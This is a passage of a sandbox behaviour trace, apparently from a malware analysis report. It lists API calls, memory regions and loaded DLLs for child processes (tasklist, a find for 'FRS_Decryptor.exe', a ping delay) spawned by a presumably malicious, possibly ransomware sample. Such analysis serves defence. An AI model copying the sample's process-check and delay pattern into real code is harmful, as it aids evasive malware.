GetExitCodeProcess (in: hProcess=0x60, lpExitCode=0x5df938 | out: lpExitCode=0x5df938*=0x0) returned 1 [0120.186] CloseHandle (hObject=0x60) returned 1 [0120.186] _get_osfhandle (_FileHandle=1) returned 0x158 [0120.186] SetConsoleMode (hConsoleHandle=0x158, dwMode=0x0) returned 0 [0120.186] _get_osfhandle (_FileHandle=1) returned 0x158 [0120.186] GetConsoleMode (in: hConsoleHandle=0x158, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0120.186] _get_osfhandle (_FileHandle=0) returned 0x24 [0120.186] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0120.186] SetConsoleInputExeNameW () returned 0x1 [0120.186] GetConsoleOutputCP () returned 0x1b5 [0120.186] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0120.186] SetThreadUILanguage (LangId=0x0) returned 0x409 [0120.187] exit (_Code=0) Process: id = "124" image_name = "tasklist.exe" filename = "c:\\windows\\syswow64\\tasklist.exe" page_root = "0xf753000" os_pid = "0xbd4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "123" os_parent_pid = "0xbdc" cmd_line = "tasklist" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6424 start_va = 0xa0000 end_va = 0xb6fff entry_point = 0xa0000 region_type = mapped_file name = "tasklist.exe" filename = "\\Windows\\SysWOW64\\tasklist.exe" (normalized: "c:\\windows\\syswow64\\tasklist.exe") Region: id = 6425 start_va = 0xf20000 end_va = 0xf3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f20000" filename = "" Region: id = 6426 start_va = 0xf40000 end_va = 0xf41fff entry_point = 0x0 region_type = private name = "private_0x0000000000f40000" filename = "" Region: id = 6427 start_va = 0xf50000 end_va = 0xf5efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f50000" filename = "" Region: id = 6428 start_va = 0xf60000 end_va = 0xf9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f60000" filename = "" Region: id = 6429 start_va = 0xfa0000 end_va = 0xfdffff entry_point = 0x0 region_type = private name = "private_0x0000000000fa0000" filename = "" Region: id = 6430 start_va = 0xfe0000 end_va = 0xfe3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fe0000" filename = "" Region: id = 6431 start_va = 0xff0000 end_va = 0xff0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ff0000" filename = "" Region: id = 6432 start_va = 0x1000000 end_va = 0x1001fff entry_point = 0x0 region_type = private name = "private_0x0000000001000000" filename = "" Region: id = 6433 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6434 start_va = 0x7ea30000 end_va = 0x7ea52fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ea30000" filename = "" Region: id = 6435 start_va = 0x7ea57000 end_va = 0x7ea57fff entry_point = 0x0 region_type = private name = "private_0x000000007ea57000" filename = "" Region: id = 6436 start_va = 0x7ea59000 end_va = 0x7ea59fff entry_point = 0x0 region_type = private name = "private_0x000000007ea59000" filename = "" Region: id = 6437 start_va = 0x7ea5d000 end_va = 0x7ea5ffff entry_point = 0x0 region_type = private name = "private_0x000000007ea5d000" filename = "" Region: id = 6438 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6439 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6440 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6441 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 6461 start_va = 0x1140000 end_va = 0x114ffff entry_point = 0x0 region_type = private name = "private_0x0000000001140000" filename = "" Region: id = 6462 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6463 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6464 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6469 start_va = 0xf20000 end_va = 0xf2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f20000" filename = "" Region: id = 6470 start_va = 0xf30000 end_va = 0xf33fff entry_point = 0x0 region_type = private name = "private_0x0000000000f30000" filename = "" Region: id = 6471 start_va = 0xf40000 end_va = 0xf42fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f40000" filename = "" Region: id = 6472 start_va = 0x1010000 end_va = 0x108dfff entry_point = 0x1010000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6473 start_va = 0x1090000 end_va = 0x1090fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001090000" filename = "" Region: id = 6474 start_va = 0x10a0000 end_va = 0x10a0fff entry_point = 0x0 region_type = private name = "private_0x00000000010a0000" filename = "" Region: id = 6475 start_va = 0x10b0000 end_va = 0x10b0fff entry_point = 0x0 region_type = private name = "private_0x00000000010b0000" filename = "" Region: id = 6476 start_va = 0x10c0000 end_va = 0x10c3fff entry_point = 0x0 region_type = private name = "private_0x00000000010c0000" filename = "" Region: id = 6477 start_va = 0x10d0000 end_va = 0x10d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010d0000" filename = "" Region: id = 6478 start_va = 0x10e0000 end_va = 0x10e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010e0000" filename = "" Region: id = 6479 start_va = 0x10f0000 end_va = 0x112ffff entry_point = 0x0 region_type = private name = "private_0x00000000010f0000" filename = "" Region: id = 6480 start_va = 0x1150000 end_va = 0x1291fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001150000" filename = "" Region: id = 6481 start_va = 0x12b0000 end_va = 0x13affff entry_point = 0x0 region_type = private name = "private_0x00000000012b0000" filename = "" Region: id = 6482 start_va = 0x13b0000 end_va = 0x1537fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000013b0000" filename = "" Region: id = 6483 start_va = 0x1560000 end_va = 0x156ffff entry_point = 0x0 region_type = private name = "private_0x0000000001560000" filename = "" Region: id = 6484 start_va = 0x1570000 end_va = 0x16f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001570000" filename = "" Region: id = 6485 start_va = 0x1700000 end_va = 0x2afffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001700000" filename = "" Region: id = 6486 start_va = 0x2b00000 end_va = 0x2dd4fff entry_point = 0x2b00000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 6487 start_va = 0x2de0000 end_va = 0x31dbfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002de0000" filename = "" Region: id = 6488 start_va = 0x31e0000 end_va = 0x321ffff entry_point = 0x0 region_type = private name = "private_0x00000000031e0000" filename = "" Region: id = 6489 start_va = 0x73430000 end_va = 0x73471fff entry_point = 0x73430000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 6490 start_va = 0x73480000 end_va = 0x734e0fff entry_point = 0x73480000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 6491 start_va = 0x734f0000 end_va = 0x734fbfff entry_point = 0x734f0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 6492 start_va = 0x73530000 end_va = 0x7353ffff entry_point = 0x73530000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 6493 start_va = 0x73540000 end_va = 0x7355afff entry_point = 0x73540000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 6494 start_va = 0x73560000 end_va = 0x73569fff entry_point = 0x73560000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 6495 start_va = 0x73570000 end_va = 0x736b7fff entry_point = 0x73570000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 6496 start_va = 0x736c0000 end_va = 0x736d1fff entry_point = 0x736c0000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 6497 start_va = 0x73da0000 end_va = 0x73ddcfff entry_point = 0x73da0000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 6498 start_va = 0x73de0000 end_va = 0x73df3fff entry_point = 0x73de0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 6499 start_va = 0x73e10000 end_va = 0x73e18fff entry_point = 0x73e10000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 6500 start_va = 0x73f20000 end_va = 0x73f3cfff entry_point = 0x73f20000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 6501 start_va = 0x73f40000 end_va = 0x73f6efff entry_point = 0x73f40000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 6502 start_va = 0x73f70000 end_va = 0x73f87fff entry_point = 0x73f70000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 6503 start_va = 0x74310000 end_va = 0x74317fff entry_point = 0x74310000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 6504 start_va = 0x745f0000 end_va = 0x745f8fff entry_point = 0x745f0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 6505 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 6506 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 6507 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 6508 start_va = 0x74bc0000 end_va = 0x74d0dfff entry_point = 0x74bc0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 6509 start_va = 0x74d10000 end_va = 0x74d87fff entry_point = 0x74d10000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 6510 start_va = 0x74d90000 end_va = 0x74e16fff entry_point = 0x74d90000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 6511 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 6512 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 6513 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6514 start_va = 0x75360000 end_va = 0x75456fff entry_point = 0x75360000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 6515 start_va = 0x75460000 end_va = 0x755aefff entry_point = 0x75460000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 6516 start_va = 0x75700000 end_va = 0x7577cfff entry_point = 0x75700000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 6517 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6518 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 6519 start_va = 0x76c50000 end_va = 0x76d5bfff entry_point = 0x76c50000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 6520 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 6521 start_va = 0x76d70000 end_va = 0x76db0fff entry_point = 0x76d70000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 6522 start_va = 0x76dc0000 end_va = 0x76de4fff entry_point = 0x76dc0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 6523 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6524 start_va = 0x76ec0000 end_va = 0x76fc7fff entry_point = 0x76ec0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 6525 start_va = 0x7e930000 end_va = 0x7ea2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e930000" filename = "" Region: id = 6526 start_va = 0x7ea5a000 end_va = 0x7ea5cfff entry_point = 0x0 region_type = private name = "private_0x000000007ea5a000" filename = "" Thread: id = 359 os_tid = 0xb3c Thread: id = 361 os_tid = 0xbe8 Thread: id = 362 os_tid = 0x8dc Thread: id = 363 os_tid = 0x8d8 Process: id = "125" image_name = "find.exe" filename = "c:\\windows\\syswow64\\find.exe" page_root = "0x60f22000" os_pid = "0xb40" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "123" os_parent_pid = "0xbdc" cmd_line = "find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6443 start_va = 0xa40000 end_va = 0xa5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a40000" filename = "" Region: id = 6444 start_va = 0xa60000 end_va = 0xa61fff entry_point = 0x0 region_type = private name = "private_0x0000000000a60000" filename = "" Region: id = 6445 start_va = 0xa70000 end_va = 0xa7efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a70000" filename = "" Region: id = 6446 start_va = 0xa80000 end_va = 0xabffff entry_point = 0x0 region_type = private name = "private_0x0000000000a80000" filename = "" Region: id = 6447 start_va = 0xac0000 end_va = 0xafffff entry_point = 0x0 region_type = private name = "private_0x0000000000ac0000" filename = "" Region: id = 6448 start_va = 0xb00000 end_va = 0xb03fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b00000" filename = "" Region: id = 6449 start_va = 0xb10000 end_va = 0xb10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b10000" filename = "" Region: id = 6450 start_va = 0xb20000 end_va = 0xb21fff entry_point = 0x0 region_type = private name = "private_0x0000000000b20000" filename = "" Region: id = 6451 start_va = 0x11c0000 end_va = 0x11c6fff entry_point = 0x11c0000 region_type = mapped_file name = "find.exe" filename = "\\Windows\\SysWOW64\\find.exe" (normalized: "c:\\windows\\syswow64\\find.exe") Region: id = 6452 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6453 start_va = 0x7f300000 end_va = 0x7f322fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f300000" filename = "" Region: id = 6454 start_va = 0x7f323000 end_va = 0x7f323fff entry_point = 0x0 region_type = private name = "private_0x000000007f323000" filename = "" Region: id = 6455 start_va = 0x7f32b000 end_va = 0x7f32dfff entry_point = 0x0 region_type = private name = "private_0x000000007f32b000" filename = "" Region: id = 6456 start_va = 0x7f32e000 end_va = 0x7f32efff entry_point = 0x0 region_type = private name = "private_0x000000007f32e000" filename = "" Region: id = 6457 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6458 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6459 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6460 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 6465 start_va = 0xcb0000 end_va = 0xcbffff entry_point = 0x0 region_type = private name = "private_0x0000000000cb0000" filename = "" Region: id = 6466 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6467 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6468 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Thread: id = 360 os_tid = 0x974 Process: id = "126" image_name = "ping.exe" filename = "c:\\windows\\syswow64\\ping.exe" page_root = "0x6bcc0000" os_pid = "0x820" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "ping -n 3 127.1" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6527 start_va = 0x730000 end_va = 0x74ffff entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 6528 start_va = 0x750000 end_va = 0x751fff entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 6529 start_va = 0x760000 end_va = 0x76efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000760000" filename = "" Region: id = 6530 start_va = 0x770000 end_va = 0x7affff entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 6531 start_va = 0x7b0000 end_va = 0x7effff entry_point = 0x0 region_type = private name = "private_0x00000000007b0000" filename = "" Region: id = 6532 start_va = 0x7f0000 end_va = 0x7f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007f0000" filename = "" Region: id = 6533 start_va = 0x800000 end_va = 0x800fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 6534 start_va = 0x810000 end_va = 0x811fff entry_point = 0x0 region_type = private name = "private_0x0000000000810000" filename = "" Region: id = 6535 start_va = 0x940000 end_va = 0x948fff entry_point = 0x940000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\SysWOW64\\PING.EXE" (normalized: "c:\\windows\\syswow64\\ping.exe") Region: id = 6536 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6537 start_va = 0x7e160000 end_va = 0x7e182fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e160000" filename = "" Region: id = 6538 start_va = 0x7e186000 end_va = 0x7e186fff entry_point = 0x0 region_type = private name = "private_0x000000007e186000" filename = "" Region: id = 6539 start_va = 0x7e18c000 end_va = 0x7e18efff entry_point = 0x0 region_type = private name = "private_0x000000007e18c000" filename = "" Region: id = 6540 start_va = 0x7e18f000 end_va = 0x7e18ffff entry_point = 0x0 region_type = private name = "private_0x000000007e18f000" filename = "" Region: id = 6541 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6542 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6543 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6544 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 6545 start_va = 0x890000 end_va = 0x89ffff entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 6546 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6547 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6548 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6549 start_va = 0x730000 end_va = 0x73ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000730000" filename = "" Region: id = 6550 start_va = 0x740000 end_va = 0x743fff entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 6551 start_va = 0x8a0000 end_va = 0x91dfff entry_point = 0x8a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6552 start_va = 0xa80000 end_va = 0xb7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a80000" filename = "" Region: id = 6553 start_va = 0xce0000 end_va = 0xceffff entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 6554 start_va = 0x73db0000 end_va = 0x73db7fff entry_point = 0x73db0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 6555 start_va = 0x73dc0000 end_va = 0x73dddfff entry_point = 0x73dc0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 6556 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 6557 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 6558 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 6559 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 6560 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 6561 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = 